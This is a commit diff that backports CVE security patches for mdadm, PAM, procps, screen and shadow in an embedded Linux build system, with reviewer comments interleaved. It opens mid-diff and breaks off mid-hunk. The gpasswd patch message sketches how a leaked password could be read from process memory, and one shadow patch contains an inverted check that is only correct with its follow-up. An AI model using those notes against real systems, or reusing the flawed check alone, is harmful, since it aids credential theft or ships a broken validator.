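+index ad56344f..d3af0ab5 100644
+--- a/Detail.c
++++ b/Detail.c
+@@ -66,11 +66,11 @@ int Detail(char *dev, struct context *c)
+ int spares = 0;
+ struct stat stb;
+ int failed = 0;
+- struct supertype *st;
++ struct supertype *st = NULL;
+ char *subarray = NULL;
+ int max_disks = MD_SB_DISKS; /* just a default */
+ struct mdinfo *info = NULL;
+- struct mdinfo *sra;
++ struct mdinfo *sra = NULL;
+ struct mdinfo *subdev;
+ char *member = NULL;
+ char *container = NULL;
+@@ -93,8 +93,7 @@ int Detail(char *dev, struct context *c)
+ if (!sra) {
+ if (md_get_array_info(fd, &array)) {
+ pr_err("%s does not appear to be an md device\n", dev);
+- close(fd);
+- return rv;
++ goto out;
+ }
+ }
+ external = (sra != NULL && sra->array.major_version == -1 &&
+@@ -108,16 +107,13 @@ int Detail(char *dev, struct context *c)
+ sra->devs == NULL) {
+ pr_err("Array associated with md device %s does not exist.\n",
+ dev);
+- close(fd);
+- sysfs_free(sra);
+- return rv;
++ goto out;
+ }
+ array = sra->array;
+ } else {
+ pr_err("cannot get array detail for %s: %s\n",
+ dev, strerror(errno));
+- close(fd);
+- return rv;
++ goto out;
+ }
+ }
+
+@@ -827,10 +823,12 @@ out:
+ close(fd);
+ free(subarray);
+ free(avail);
+- for (d = 0; d < n_devices; d++)
+- free(devices[d]);
++ if (devices)
++ for (d = 0; d < n_devices; d++)
++ free(devices[d]);
+ free(devices);
+ sysfs_free(sra);
++ free(st);
+ return rv;
+ }
+
+--
+cgit
+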
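Review bot: The three early exits now jump to `out:`, which frees `subarray`, `avail`, `devices` and `st`, but the declaration hunk only shows `st`, `sra`, `subarray` and `info` initialised to NULL. `avail`, `devices` and `n_devices` are declared outside the hunks; if any of them lacks an initialiser, the new `goto out` paths would free or iterate over an indeterminate value, so their declarations should be checked when applying this backport to 4.1. The added `if (devices)` guard suggests `devices` can be NULL at that point, but nothing visible confirms the same for `avail`. `free(st)` releases only the supertype struct itself; whether superblock data is still attached to it at `out:` cannot be told from these hunks.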
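--- a/meta/recipes-extended/mdadm/mdadm_4.1.bb
+++ b/meta/recipes-extended/mdadm/mdadm_4.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Tool for managing software RAID under Linux"
 HOMEPAGE = "http://www.kernel.org/pub/linux/utils/raid/mdadm/"
+DESCRIPTION = "mdadm is a Linux utility used to manage and monitor software RAID devices."
 
 # Some files are GPLv2+ while others are GPLv2.
 LICENSE = "GPLv2 & GPLv2+"
@@ -23,6 +24,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/utils/raid/mdadm/${BPN}-${PV}.tar.xz \
  file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \
  file://include_sysmacros.patch \
  file://0001-mdadm-skip-test-11spare-migration.patch \
+ file://CVE-2023-28736.patch \
+ file://CVE-2023-28938.patch \
  "
 
 SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598"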
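--- a/meta/recipes-extended/mingetty/mingetty_1.08.bb
+++ b/meta/recipes-extended/mingetty/mingetty_1.08.bb
@@ -1,6 +1,7 @@
 SUMMARY = "Compact getty terminal handler for virtual consoles only"
 SECTION = "console/utils"
 HOMEPAGE = "http://sourceforge.net/projects/mingetty/"
+DESCRIPTION = "This is a small Linux console getty that is started on the Linux text console, asks for a login name and then tranfers over to login directory. Is extended to allow automatic login and starting any app."
 LICENSE = "GPLv2"
 PR = "r3"
 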
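--- a/meta/recipes-extended/newt/libnewt_0.52.21.bb
+++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb
@@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac
 
 S = "${WORKDIR}/newt-${PV}"
 
-inherit autotools-brokensep python3native python3-dir
+inherit autotools-brokensep python3native python3-dir python3targetconfig
 
 EXTRA_OECONF = "--without-tcl --with-python"
 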
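--- /dev/null
+++ b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch
@@ -0,0 +1,59 @@
+From 031bb5a5d0d950253b68138b498dc93be69a64cb Mon Sep 17 00:00:00 2001
+From: Matthias Gerstner <matthias.gerstner@suse.de>
+Date: Wed, 27 Dec 2023 14:01:59 +0100
+Subject: [PATCH] pam_namespace: protect_dir(): use O_DIRECTORY to prevent
+ local DoS situations
+
+Without O_DIRECTORY the path crawling logic is subject to e.g. FIFOs
+being placed in user controlled directories, causing the PAM module to
+block indefinitely during `openat()`.
+
+Pass O_DIRECTORY to cause the `openat()` to fail if the path does not
+refer to a directory.
+
+With this the check whether the final path element is a directory
+becomes unnecessary, drop it.
+
+Upstream-Status: Backport [https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb]
+CVE: CVE-2024-22365
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ modules/pam_namespace/pam_namespace.c | 18 +-----------------
+ 1 file changed, 1 insertion(+), 17 deletions(-)
+
+diff --git a/modules/pam_namespace/pam_namespace.c b/modules/pam_namespace/pam_namespace.c
+index 2528cff86..f72d67189 100644
+--- a/modules/pam_namespace/pam_namespace.c
++++ b/modules/pam_namespace/pam_namespace.c
+@@ -1201,7 +1201,7 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
+ int dfd = AT_FDCWD;
+ int dfd_next;
+ int save_errno;
+- int flags = O_RDONLY;
++ int flags = O_RDONLY | O_DIRECTORY;
+ int rv = -1;
+ struct stat st;
+
+@@ -1255,22 +1255,6 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
+ rv = openat(dfd, dir, flags);
+ }
+
+- if (rv != -1) {
+- if (fstat(rv, &st) != 0) {
+- save_errno = errno;
+- close(rv);
+- rv = -1;
+- errno = save_errno;
+- goto error;
+- }
+- if (!S_ISDIR(st.st_mode)) {
+- close(rv);
+- errno = ENOTDIR;
+- rv = -1;
+- goto error;
+- }
+- }
+-
+ if (flags & O_NOFOLLOW) {
+ /* we are inside user-owned dir - protect */
+ if (protect_mount(rv, p, idata) == -1) {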
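Review bot: The reason for `O_DIRECTORY` is recorded only in the commit message, and with the explicit `S_ISDIR` check removed nothing in protect_dir() states that this flag is now the only thing rejecting non-directories. A comment at the initialiser, such as `/* O_DIRECTORY: make openat() fail on a FIFO or other non-directory instead of blocking (CVE-2024-22365) */`, would keep a later cleanup from dropping the flag. The body of protect_dir() continues outside both hunks, so any other `openat()` call that builds its own flags should be checked for the same property.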
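--- a/meta/recipes-extended/pam/libpam_1.3.1.bb
+++ b/meta/recipes-extended/pam/libpam_1.3.1.bb
@@ -24,6 +24,7 @@ SRC_URI = "https://github.com/linux-pam/linux-pam/releases/download/v${PV}/Linux
  file://pam-security-abstract-securetty-handling.patch \
  file://pam-unix-nullok-secure.patch \
  file://crypt_configure.patch \
+ file://CVE-2024-22365.patch \
  "
 
 SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165"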
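--- a/meta/recipes-extended/parted/parted_3.3.bb
+++ b/meta/recipes-extended/parted/parted_3.3.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Disk partition editing/resizing utility"
 HOMEPAGE = "http://www.gnu.org/software/parted/parted.html"
+DESCRIPTION = "GNU Parted manipulates partition tables. This is useful for creating space for new operating systems, reorganizing disk usage, copying data on hard disks and disk imaging."
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=2f31b266d3440dd7ee50f92cf67d8e6c"
 SECTION = "console/tools"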
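--- a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
+++ b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
@@ -1,5 +1,7 @@
 SUMMARY = "Convert::ASN1 - Perl ASN.1 Encode/Decode library"
 SECTION = "libs"
+HOMEPAGE = "https://metacpan.org/source/GBARR/Convert-ASN1-0.27"
+DESCRIPTION = "Convert::ASN1 is a perl library for encoding/decoding data using ASN.1 definitions."
 LICENSE = "Artistic-1.0 | GPL-1.0+"
 LIC_FILES_CHKSUM = "file://README.md;beginline=91;endline=97;md5=ceff7fd286eb6d8e8e0d3d23e096a63f"
 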
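--- a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
+++ b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Perl modules useful for manipulating date and time information"
 HOMEPAGE = "https://metacpan.org/release/TimeDate"
+DESCRIPTION = "This is the perl5 TimeDate distribution. It requires perl version 5.003 or later."
 SECTION = "libs"
 # You can redistribute it and/or modify it under the same terms as Perl itself.
 LICENSE = "Artistic-1.0 | GPL-1.0+"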
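--- /dev/null
+++ b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch
@@ -0,0 +1,85 @@
+From 2c933ecba3bb1d3041a5a7a53a7b4078a6003413 Mon Sep 17 00:00:00 2001
+From: Craig Small <csmall@dropbear.xyz>
+Date: Thu, 10 Aug 2023 21:18:38 +1000
+Subject: [PATCH] ps: Fix possible buffer overflow in -C option
+
+ps allocates memory using malloc(length of arg * len of struct).
+In certain strange circumstances, the arg length could be very large
+and the multiplecation will overflow, allocating a small amount of
+memory.
+
+Subsequent strncpy() will then write into unallocated memory.
+The fix is to use calloc. It's slower but this is a one-time
+allocation. Other malloc(x * y) calls have also been replaced
+by calloc(x, y)
+
+References:
+ https://www.freelists.org/post/procps/ps-buffer-overflow-CVE-20234016
+ https://nvd.nist.gov/vuln/detail/CVE-2023-4016
+ https://gitlab.com/procps-ng/procps/-/issues/297
+ https://bugs.debian.org/1042887
+
+Signed-off-by: Craig Small <csmall@dropbear.xyz>
+
+CVE: CVE-2023-4016
+Upstream-Status: Backport [https://gitlab.com/procps-ng/procps/-/commit/2c933ecba3bb1d3041a5a7a53a7b4078a6003413]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+
+---
+ NEWS | 1 +
+ ps/parser.c | 8 ++++----
+ 2 files changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/NEWS b/NEWS
+index b9509734..64fa3da8 100644
+--- a/NEWS
++++ b/NEWS
+@@ -1,3 +1,5 @@
++ * ps: Fix buffer overflow in -C option CVE-2023-4016 Debian #1042887, issue #297
++
+ procps-ng-3.3.16
+ ----------------
+ * library: Increment to 8:2:0
+diff --git a/ps/parser.c b/ps/parser.c
+index 248aa741..15873dfa 100644
+--- a/ps/parser.c
++++ b/ps/parser.c
+@@ -184,7 +184,6 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
+ const char *err; /* error code that could or did happen */
+ /*** prepare to operate ***/
+ node = malloc(sizeof(selection_node));
+- node->u = malloc(strlen(arg)*sizeof(sel_union)); /* waste is insignificant */
+ node->n = 0;
+ buf = strdup(arg);
+ /*** sanity check and count items ***/
+@@ -205,6 +204,7 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
+ } while (*++walk);
+ if(need_item) goto parse_error;
+ node->n = items;
++ node->u = calloc(items, sizeof(sel_union));
+ /*** actually parse the list ***/
+ walk = buf;
+ while(items--){
+@@ -1031,15 +1031,15 @@ static const char *parse_trailing_pids(void){
+ thisarg = ps_argc - 1; /* we must be at the end now */
+
+ pidnode = malloc(sizeof(selection_node));
+- pidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ pidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
+ pidnode->n = 0;
+
+ grpnode = malloc(sizeof(selection_node));
+- grpnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ grpnode->u = calloc(i,sizeof(sel_union)); /* waste is insignificant */
+ grpnode->n = 0;
+
+ sidnode = malloc(sizeof(selection_node));
+- sidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ sidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
+ sidnode->n = 0;
+
+ while(i--){
+--
+GitLab
+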
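Review bot: In parse_list() `node->u` is now assigned only after `if(need_item) goto parse_error;`, so on that path it still holds the indeterminate value left by `malloc(sizeof(selection_node))`. The `parse_error` label lies outside the hunk; if its cleanup frees `node->u`, which should be confirmed in the full file, that becomes a free of an uninitialised pointer on malformed list input. Adding `node->u = NULL;` next to `node->n = 0;` closes the gap. The results of `malloc()` and `calloc()` are also used without a NULL check in both ps/parser.c hunks.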
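--- a/meta/recipes-extended/procps/procps_3.3.16.bb
+++ b/meta/recipes-extended/procps/procps_3.3.16.bb
@@ -12,8 +12,9 @@ DEPENDS = "ncurses"
 
 inherit autotools gettext pkgconfig update-alternatives
 
-SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \
+SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \
  file://sysctl.conf \
+ file://CVE-2023-4016.patch \
  "
 SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f"
 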
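--- a/meta/recipes-extended/psmisc/psmisc_23.3.bb
+++ b/meta/recipes-extended/psmisc/psmisc_23.3.bb
@@ -2,7 +2,7 @@ require psmisc.inc
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3"
 
-SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \
+SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \
  file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \
  "
 SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772"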
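--- a/meta/recipes-extended/quota/quota_4.05.bb
+++ b/meta/recipes-extended/quota/quota_4.05.bb
@@ -1,6 +1,7 @@
 SUMMARY = "Tools for monitoring & limiting user disk usage per filesystem"
 SECTION = "base"
 HOMEPAGE = "http://sourceforge.net/projects/linuxquota/"
+DESCRIPTION = "Tools and patches for the Linux Diskquota system as part of the Linux kernel"
 BUGTRACKER = "http://sourceforge.net/tracker/?group_id=18136&atid=118136"
 LICENSE = "BSD & GPLv2+ & LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://rquota_server.c;beginline=1;endline=20;md5=fe7e0d7e11c6f820f8fa62a5af71230f \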
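--- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
+++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
@@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}"
 
 SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c"
 
-SRC_URI = "git://github.com/thkukuk/${BPN} \
+SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \
  file://0001-Use-cross-compiled-rpcgen.patch \
  "
 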
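--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch
@@ -0,0 +1,68 @@
+Description: [CVE-2021-26937] Fix out of bounds array access
+Author: Michael Schröder <mls@suse.de>
+Bug-Debian: https://bugs.debian.org/982435
+Bug: https://savannah.gnu.org/bugs/?60030
+Bug: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html
+Bug-OSS-Security: https://www.openwall.com/lists/oss-security/2021/02/09/3
+Origin: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00010.html
+
+CVE: CVE-2021-26937
+Upstream-Status: Pending
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+--- a/encoding.c
++++ b/encoding.c
+@@ -43,7 +43,7 @@
+ # ifdef UTF8
+ static int recode_char __P((int, int, int));
+ static int recode_char_to_encoding __P((int, int));
+-static void comb_tofront __P((int, int));
++static void comb_tofront __P((int));
+ # ifdef DW_CHARS
+ static int recode_char_dw __P((int, int *, int, int));
+ static int recode_char_dw_to_encoding __P((int, int *, int));
+@@ -1263,6 +1263,8 @@
+ {0x30000, 0x3FFFD},
+ };
+
++ if (c >= 0xdf00 && c <= 0xdfff)
++ return 1; /* dw combining sequence */
+ return ((bisearch(c, wide, sizeof(wide) / sizeof(struct interval) - 1)) ||
+ (cjkwidth &&
+ bisearch(c, ambiguous,
+@@ -1330,11 +1332,12 @@
+ }
+
+ static void
+-comb_tofront(root, i)
+-int root, i;
++comb_tofront(i)
++int i;
+ {
+ for (;;)
+ {
++ int root = i >= 0x700 ? 0x801 : 0x800;
+ debug1("bring to front: %x\n", i);
+ combchars[combchars[i]->prev]->next = combchars[i]->next;
+ combchars[combchars[i]->next]->prev = combchars[i]->prev;
+@@ -1396,9 +1399,9 @@
+ {
+ /* full, recycle old entry */
+ if (c1 >= 0xd800 && c1 < 0xe000)
+- comb_tofront(root, c1 - 0xd800);
++ comb_tofront(c1 - 0xd800);
+ i = combchars[root]->prev;
+- if (c1 == i + 0xd800)
++ if (i == 0x800 || i == 0x801 || c1 == i + 0xd800)
+ {
+ /* completely full, can't recycle */
+ debug("utf8_handle_comp: completely full!\n");
+@@ -1422,7 +1425,7 @@
+ mc->font = (i >> 8) + 0xd8;
+ mc->fontx = 0;
+ debug3("combinig char %x %x -> %x\n", c1, c, i + 0xd800);
+- comb_tofront(root, i);
++ comb_tofront(i);
+ }
+
+ #else /* !UTF8 */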
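Review bot: The constants `0x700`, `0x800` and `0x801` introduced in comb_tofront() and in the `completely full` test are unexplained, and the derived `root = i >= 0x700 ? 0x801 : 0x800` has to stay in step with the caller's own `root`, which is set outside these hunks. A comment on the new line, for example `/* 0x800 and 0x801 appear to be the two list heads; indices from 0x700 up use the second */` with the wording confirmed against the full file, would make that invariant reviewable. comb_tofront() also dereferences `combchars[i]` with no NULL check visible here, so it relies on every caller passing only populated slots. The patch is tagged `Upstream-Status: Pending` with a mailing-list origin, so it should be compared with whatever fix upstream eventually merged.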
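--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
@@ -0,0 +1,40 @@
+From e9ad41bfedb4537a6f0de20f00b27c7739f168f7 Mon Sep 17 00:00:00 2001
+From: Alexander Naumov <alexander_naumov@opensuse.org>
+Date: Mon, 30 Jan 2023 17:22:25 +0200
+Subject: fix: missing signal sending permission check on failed query messages
+
+Signed-off-by: Alexander Naumov <alexander_naumov@opensuse.org>
+
+CVE: CVE-2023-24626
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/screen.git/commit/?id=e9ad41bfedb4537a6f0de20f00b27c7739f168f7]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ socket.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/socket.c b/socket.c
+index bb68b35..9d87445 100644
+--- a/socket.c
++++ b/socket.c
+@@ -1285,11 +1285,16 @@ ReceiveMsg()
+ else
+ queryflag = -1;
+
+- Kill(m.m.command.apid,
++ if (CheckPid(m.m.command.apid)) {
++ Msg(0, "Query attempt with bad pid(%d)!", m.m.command.apid);
++ }
++ else {
++ Kill(m.m.command.apid,
+ (queryflag >= 0)
+ ? SIGCONT
+ : SIG_BYE); /* Send SIG_BYE if an error happened */
+- queryflag = -1;
++ queryflag = -1;
++ }
+ }
+ break;
+ case MSG_COMMAND:
+--
+2.25.1
+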
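Review bot: When `CheckPid()` rejects the pid, `queryflag` is no longer reset, because `queryflag = -1;` moved into the `else` branch together with `Kill()`. Before this change the reset ran unconditionally after the signal was sent, so a rejected query can now leave `queryflag` at a non-negative value for whatever code in ReceiveMsg() reads it next; that code is outside the hunk. Unless the stale value is intended, keep the reset after the `if`/`else` so both paths execute `queryflag = -1;`.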
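--- a/meta/recipes-extended/screen/screen_4.8.0.bb
+++ b/meta/recipes-extended/screen/screen_4.8.0.bb
@@ -21,6 +21,8 @@ SRC_URI = "${GNU_MIRROR}/screen/screen-${PV}.tar.gz \
  file://0002-comm.h-now-depends-on-term.h.patch \
  file://0001-fix-for-multijob-build.patch \
  file://0001-Remove-more-compatibility-stuff.patch \
+ file://CVE-2021-26937.patch \
+ file://CVE-2023-24626.patch \
  "
 
 SRC_URI[md5sum] = "d276213d3acd10339cd37848b8c4ab1e"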
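--- a/meta/recipes-extended/sed/sed_4.8.bb
+++ b/meta/recipes-extended/sed/sed_4.8.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Stream EDitor (text filtering utility)"
 HOMEPAGE = "http://www.gnu.org/software/sed/"
+DESCRIPTION = "sed (stream editor) is a non-interactive command-line text editor."
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=c678957b0c8e964aa6c70fd77641a71e \
  file://sed/sed.h;beginline=1;endline=15;md5=fb3c7e6fbca6f66943859153d4be8efe \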
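--- /dev/null
+++ b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch
@@ -0,0 +1,66 @@
+From 2eaea70111f65b16d55998386e4ceb4273c19eb4 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Christian=20G=C3=B6ttsche?= <cgzones@googlemail.com>
+Date: Fri, 31 Mar 2023 14:46:50 +0200
+Subject: [PATCH] Overhaul valid_field()
+
+e5905c4b ("Added control character check") introduced checking for
+control characters but had the logic inverted, so it rejects all
+characters that are not control ones.
+
+Cast the character to `unsigned char` before passing to the character
+checking functions to avoid UB.
+
+Use strpbrk(3) for the illegal character test and return early.
+
+Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/2eaea70111f65b16d55998386e4ceb4273c19eb4]
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/fields.c | 24 ++++++++++--------------
+ 1 file changed, 10 insertions(+), 14 deletions(-)
+
+diff --git a/lib/fields.c b/lib/fields.c
+index fb51b582..53929248 100644
+--- a/lib/fields.c
++++ b/lib/fields.c
+@@ -37,26 +37,22 @@ int valid_field (const char *field, const char *illegal)
+
+ /* For each character of field, search if it appears in the list
+ * of illegal characters. */
++ if (illegal && NULL != strpbrk (field, illegal)) {
++ return -1;
++ }
++
++ /* Search if there are non-printable or control characters */
+ for (cp = field; '\0' != *cp; cp++) {
+- if (strchr (illegal, *cp) != NULL) {
++ unsigned char c = *cp;
++ if (!isprint (c)) {
++ err = 1;
++ }
++ if (iscntrl (c)) {
+ err = -1;
+ break;
+ }
+ }
+
+- if (0 == err) {
+- /* Search if there are non-printable or control characters */
+- for (cp = field; '\0' != *cp; cp++) {
+- if (!isprint (*cp)) {
+- err = 1;
+- }
+- if (!iscntrl (*cp)) {
+- err = -1;
+- break;
+- }
+- }
+- }
+-
+ return err;
+ }
+
+--
+2.34.1
+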
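Review bot: The patch header has no `CVE:` tag, although its message says it repairs the inverted control-character test from e5905c4b, which this commit ships as CVE-2023-29383.patch. Anyone auditing the recipe by CVE id will then find only the first, inverted patch. I would add `CVE: CVE-2023-29383` next to the `Upstream-Status:` line. valid_field() starts above the inner hunk, so whether `field` is checked for NULL before `strpbrk (field, illegal)` cannot be seen from here.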
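--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
@@ -0,0 +1,54 @@
+From e5905c4b84d4fb90aefcd96ee618411ebfac663d Mon Sep 17 00:00:00 2001
+From: tomspiderlabs <128755403+tomspiderlabs@users.noreply.github.com>
+Date: Thu, 23 Mar 2023 23:39:38 +0000
+Subject: [PATCH] Added control character check
+
+Added control character check, returning -1 (to "err") if control characters are present.
+
+CVE: CVE-2023-29383
+Upstream-Status: Backport
+
+Reference to upstream:
+https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/fields.c | 11 +++++++----
+ 1 file changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/lib/fields.c b/lib/fields.c
+index 640be931..fb51b582 100644
+--- a/lib/fields.c
++++ b/lib/fields.c
+@@ -21,9 +21,9 @@
+ *
+ * The supplied field is scanned for non-printable and other illegal
+ * characters.
+- * + -1 is returned if an illegal character is present.
+- * + 1 is returned if no illegal characters are present, but the field
+- * contains a non-printable character.
++ * + -1 is returned if an illegal or control character is present.
++ * + 1 is returned if no illegal or control characters are present,
++ * but the field contains a non-printable character.
+ * + 0 is returned otherwise.
+ */
+ int valid_field (const char *field, const char *illegal)
+@@ -45,10 +45,13 @@ int valid_field (const char *field, const char *illegal)
+ }
+
+ if (0 == err) {
+- /* Search if there are some non-printable characters */
++ /* Search if there are non-printable or control characters */
+ for (cp = field; '\0' != *cp; cp++) {
+ if (!isprint (*cp)) {
+ err = 1;
++ }
++ if (!iscntrl (*cp)) {
++ err = -1;
+ break;
+ }
+ }
+--
+2.34.1
+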
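Review bot: The added test `if (!iscntrl (*cp))` is inverted: as written it sets `err = -1` on the first character that is not a control character, so valid_field() rejects ordinary input, and it passes a plain `char` to `isprint`/`iscntrl`. 0001-Overhaul-valid_field.patch in this same commit changes it to `if (iscntrl (c))` with `unsigned char c = *cp;`, so this patch is only correct when that one is applied after it. I would state that in the header, for example `Note: incomplete on its own, requires 0001-Overhaul-valid_field.patch`, so the pair is not split or reordered when the SRC_URI list is edited later.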
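--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch
@@ -0,0 +1,146 @@
+From 51731b01fd9a608397da22b7b9164e4996f3d4c6 Mon Sep 17 00:00:00 2001
+From: Alejandro Colomar <alx@kernel.org>
+Date: Sat, 10 Jun 2023 16:20:05 +0200
+Subject: [PATCH] gpasswd(1): Fix password leak
+
+CVE: CVE-2023-4641
+Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/65c88a43a23c2391dcc90c0abda3e839e9c57904]
+
+How to trigger this password leak?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When gpasswd(1) asks for the new password, it asks twice (as is usual
+for confirming the new password). Each of those 2 password prompts
+uses agetpass() to get the password. If the second agetpass() fails,
+the first password, which has been copied into the 'static' buffer
+'pass' via STRFCPY(), wasn't being zeroed.
+
+agetpass() is defined in <./libmisc/agetpass.c> (around line 91), and
+can fail for any of the following reasons:
+
+- malloc(3) or readpassphrase(3) failure.
+
+ These are going to be difficult to trigger. Maybe getting the system
+ to the limits of memory utilization at that exact point, so that the
+ next malloc(3) gets ENOMEM, and possibly even the OOM is triggered.
+ About readpassphrase(3), ENFILE and EINTR seem the only plausible
+ ones, and EINTR probably requires privilege or being the same user;
+ but I wouldn't discard ENFILE so easily, if a process starts opening
+ files.
+
+- The password is longer than PASS_MAX.
+
+ The is plausible with physical access. However, at that point, a
+ keylogger will be a much simpler attack.
+
+And, the attacker must be able to know when the second password is being
+introduced, which is not going to be easy.
+
+How to read the password after the leak?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Provoking the leak yourself at the right point by entering a very long
+password is easy, and inspecting the process stack at that point should
+be doable. Try to find some consistent patterns.
+
+Then, search for those patterns in free memory, right after the victim
+leaks their password.
+
+Once you get the leak, a program should read all the free memory
+searching for patterns that gpasswd(1) leaves nearby the leaked
+password.
+
+On 6/10/23 03:14, Seth Arnold wrote:
+> An attacker process wouldn't be able to use malloc(3) for this task.
+> There's a handful of tools available for userspace to allocate memory:
+>
+> - brk / sbrk
+> - mmap MAP_ANONYMOUS
+> - mmap /dev/zero
+> - mmap some other file
+> - shm_open
+> - shmget
+>
+> Most of these return only pages of zeros to a process. Using mmap of an
+> existing file, you can get some of the contents of the file demand-loaded
+> into the memory space on the first use.
+>
+> The MAP_UNINITIALIZED flag only works if the kernel was compiled with
+> CONFIG_MMAP_ALLOW_UNINITIALIZED. This is rare.
+>
+> malloc(3) doesn't zero memory, to our collective frustration, but all the
+> garbage in the allocations is from previous allocations in the current
+> process. It isn't leftover from other processes.
+>
+> The avenues available for reading the memory:
+> - /dev/mem and /dev/kmem (requires root, not available with Secure Boot)
+> - /proc/pid/mem (requires ptrace privileges, mediated by YAMA)
+> - ptrace (requires ptrace privileges, mediated by YAMA)
+> - causing memory to be swapped to disk, and then inspecting the swap
+>
+> These all require a certain amount of privileges.
+
+How to fix it?
+~~~~~~~~~~~~~~
+
+memzero(), which internally calls explicit_bzero(3), or whatever
+alternative the system provides with a slightly different name, will
+make sure that the buffer is zeroed in memory, and optimizations are not
+allowed to impede this zeroing.
+
+This is not really 100% effective, since compilers may place copies of
+the string somewhere hidden in the stack. Those copies won't get zeroed
+by explicit_bzero(3). However, that's arguably a compiler bug, since
+compilers should make everything possible to avoid optimizing strings
+that are later passed to explicit_bzero(3). But we all know that
+sometimes it's impossible to have perfect knowledge in the compiler, so
+this is plausible. Nevertheless, there's nothing we can do against such
+issues, except minimizing the time such passwords are stored in plain
+text.
+
+Security concerns
+~~~~~~~~~~~~~~~~~
+
+We believe this isn't easy to exploit. Nevertheless, and since the fix
+is trivial, this fix should probably be applied soon, and backported to
+all supported distributions, to prevent someone else having more
+imagination than us to find a way.
+
+Affected versions
+~~~~~~~~~~~~~~~~~
+
+All. Bug introduced in shadow 19990709. That's the second commit in
+the git history.
+
+Fixes: 45c6603cc86c ("[svn-upgrade] Integrating new upstream version, shadow (19990709)")
+Reported-by: Alejandro Colomar <alx@kernel.org>
+Cc: Serge Hallyn <serge@hallyn.com>
+Cc: Iker Pedrosa <ipedrosa@redhat.com>
+Cc: Seth Arnold <seth.arnold@canonical.com>
+Cc: Christian Brauner <christian@brauner.io>
+Cc: Balint Reczey <rbalint@debian.org>
+Cc: Sam James <sam@gentoo.org>
+Cc: David Runge <dvzrv@archlinux.org>
+Cc: Andreas Jaeger <aj@suse.de>
+Cc: <~hallyn/shadow@lists.sr.ht>
+Signed-off-by: Alejandro Colomar <alx@kernel.org>
+Signed-off-by: Hugo SIMELIERE <hsimeliere.opensource@witekio.com>
+---
+ src/gpasswd.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/src/gpasswd.c b/src/gpasswd.c
+index 4d75af96..a698b32a 100644
+--- a/src/gpasswd.c
++++ b/src/gpasswd.c
+@@ -918,6 +918,7 @@ static void change_passwd (struct group *gr)
+ strzero (cp);
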